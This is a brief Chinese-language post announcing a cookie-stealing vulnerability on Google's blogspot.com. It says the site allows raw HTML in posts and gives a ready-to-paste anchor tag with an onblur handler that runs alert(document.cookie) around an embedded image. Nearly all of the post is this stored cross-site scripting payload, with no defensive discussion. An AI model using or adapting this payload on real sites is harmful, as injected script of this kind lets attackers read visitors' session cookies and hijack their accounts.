Google的博客blogspot.com窃取cookie漏洞

Google的博客blogspot.com站点.
支持html,然后可以在其中插入类似如下内容.获取cookie



<a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s1600-h/5af1scd.jpg"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s200/5af1scd.jpg" alt="www.winshell.cn" id="BLOGGER_PHOTO_ID_5101217197124729042" border="0" /></a>